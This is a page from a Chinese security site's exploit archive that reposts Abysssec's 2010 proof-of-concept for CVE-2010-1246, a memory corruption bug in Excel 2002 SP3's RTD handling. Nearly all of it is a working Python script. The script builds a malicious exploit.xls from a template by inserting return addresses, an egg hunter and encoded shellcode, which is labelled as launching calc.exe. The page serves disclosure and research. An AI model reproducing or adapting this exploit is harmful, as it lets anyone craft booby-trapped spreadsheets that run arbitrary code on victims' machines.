首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Excel RTD Memory Corruption
来源:http://www.abysssec.com 作者:Abysssec 发布时间:2010-09-13  

'''
  __  __  ____         _    _ ____ 
 |  \/  |/ __ \   /\  | |  | |  _ \
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/

http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
http://www.exploit-db.com/sploits/moaub-10-exploit.zip
'''

'''
  Title             :  Excel RTD Memory Corruption
  Version           :  Excel 2002 sp3
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.microsoft.com
  Impact            :  Critical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-1246
  MOAUB Number      :  MOAUB_10_BA
'''

 

import sys

def main():
  
    try:
  fdR = open('src.xls', 'rb+')
  strTotal = fdR.read()
  str1 = strTotal[:4509]
  str2 = strTotal[5013:15000]
  str3 = strTotal[15800:]
  
  eip = "\xAd\x57\x00\x30"    # pop pop ret
  jmp = "\xF7\xC2\x03\x30"    # call esp
  
  #Egg Hunter 
  eggHunter = ""
  eggHunter += "\x90\x90\x90"
  eggHunter += "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x8A\xD8\x80\xFB\x05\x5A\x74\xEC\xB8\x63"
  eggHunter += "\x70\x74\x6e\x8B\xFA\xAF\x75\xE7\xAF\x75\xE4\xFF\xE7"  
  
  # shellcode calc.exe
  shellcode = '\x63\x70\x74\x6e\x63\x70\x74\x6e\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41'
  
  if len(eggHunter) > 266:
   print "[*] Error : Shellcode length is long"
   return
  if len(eggHunter) <=266:
   dif =266 - len(eggHunter)
   while dif > 0 :
    eggHunter += '\x90'
    dif = dif - 1
    
    
  if len(shellcode) > 800:
   print "[*] Error : Shellcode length is long"
   return
  if len(shellcode) <= 800:
   dif = 800 - len(shellcode)
   while dif > 0 :
    shellcode += '\x90'
    dif = dif - 1
    
  fdW= open('exploit.xls', 'wb+')
  fdW.write(str1)
  fdW.write("\x41\x41\x41")    # padding
  fdW.write(jmp)
  fdW.write(eggHunter)    
  fdW.write("\xeb\x06\x41\x41")  
  fdW.write(eip)
  fdW.write("\x81\xc4\x24\x16\x00\x00")  # add esp,2016
  fdW.write("\xc3")  #ret
  
  i = 0
  while i < 54 :
   fdW.write("\x41\x41\x41\x41")    # padding
   i = i + 1
   
  fdW.write(str2)
  fdW.write(shellcode)
  fdW.write(str3)
  
  fdW.close()
  fdR.close()
  print '[-] Excel file generated'
    except IOError:
        print '[*] Error : An IO error has occurred'
        print '[-] Exiting ...'
        sys.exit(-1)
               
if __name__ == '__main__':
    main()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Webkit (Apple Safari < 4.1.2/5
·Microsoft Office Word 2007 spr
·Wordpress 3.0.1 - Remote Denia
·YOPS Web Server Remote Command
·Dmx Ready v2 lite Database Dis
·Adobe Acrobat and Reader "push
·BlogItDL Database Disclosure E
·QK SMTP Server 3 RCPT TO: Comm
·Beta Asp - Anket Database Disc
·Prevx DLL preloading exploit
·Safari v5.0.1 DLL Hijacking (s
·Process Hacker Dll Hijacking E
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved